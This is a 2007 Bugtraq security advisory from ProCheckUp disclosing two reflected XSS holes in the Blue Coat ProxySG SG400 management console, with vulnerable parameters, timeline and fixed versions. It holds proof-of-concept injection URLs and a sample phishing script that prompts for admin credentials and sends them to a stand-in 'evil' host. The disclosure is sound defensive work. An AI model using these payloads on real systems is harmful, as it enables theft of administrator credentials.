Two XSS on Blue Coat ProxySG Management Console

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Two XSS on Blue Coat ProxySG Management Console
From: research@xxxxxxxxxxxxxx
Date: 1 Nov 2007 17:20:04 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

PR07-29: Two XSS on Blue Coat ProxySG Management Console

Vulnerability found: 23 July 2007

Vendor informed: 20 August 2007

Vulnerability fixed: 29 October 2007

Advisory publicly released: 1 November 2007

Severity: Medium

Description: 

Blue Coat SG400 is vulnerable to a couple of XSS holes.

Vulnerable server-side script / unfiltered parameter: 
'/Secure/Local/console/install_upload_action/crl_format' / 'name'

Vulnerable server-side script / unfiltered parameter: 
'/Secure/Local/console/install_upload_from_file.htm' / 'file'

Notes:

The admin user needs to be authenticated (HTTP basic authentication) for the 
injected JavaScript to run.


Successfully tested on:

Model: Blue Coat SG400 
Software SGOS 4.2.1.6 
Software Release ID: 25173 


Proof of concept #1:

https://target:8082/Secure/Local/console/install_upload_action/crl_format?name=";<script>alert("XSS")</script>%00

Injected payload:

"<script>alert("XSS")</script>%00

Proof of concept #2:

https://target:8082/Secure/Local/console/install_upload_from_file.htm?file=<script>alert("XSS")</script><!--

Injected payload:

<script>alert("XSS")</script><!--


A neat payload to inject instead of a alert() box would be a phishing attack 
which would forward the username and password to a third-party site (the code 
could be inserted from a third-party site). 

i.e.:

<script>
do {
        a=prompt("Blue Coat SG400: an error has occurred\nPlease enter your 
USERNAME","");
        b=prompt("Blue Coat SG400: an error has occurred\nPlease enter your 
PASSWORD","");
}while(a==null || b==null || a=="" || b=="");

alert("owned!:"+a+"/"+b);window.location="http://evil/?u="+a+"&p="+b
</script><!--


Consequences: 

An attacker may be able to cause execution of malicious scripting code in the 
browser of a Blue Coat SG400 admin who clicks on a link to a Blue Coat ProxySG 
Management Console. Such code would run within the context of the target domain.

This type of attack can result in non-persistent defacement of the target site, 
or the redirection of confidential information (i.e.: basic auth credentials 
stolen through a phishing attack as described in the Proof of Concept) to 
unauthorised  third parties.

Fixed in:

4.2.6.1, 5.2.2.5


References: 

http://www.procheckup.com/Vulnerability_2007.php
http://www.bluecoat.com/support/securityadvisories/advisory_cross-site_scripting_vulnerability


Credits: Adrian Pastor from ProCheckUp Ltd (www.procheckup.com)

Prev by Date: ZDI-07-064: Novell Client Trust Heap Overflow Vulnerability
Next by Date: SEC Consult SA-20071101-0 :: Multiple Vulnerabilities in SonicWALL SSL-VPN Client
Previous by thread: ZDI-07-064: Novell Client Trust Heap Overflow Vulnerability
Next by thread: SEC Consult SA-20071101-0 :: Multiple Vulnerabilities in SonicWALL SSL-VPN Client
Index(es):
- Date
- Thread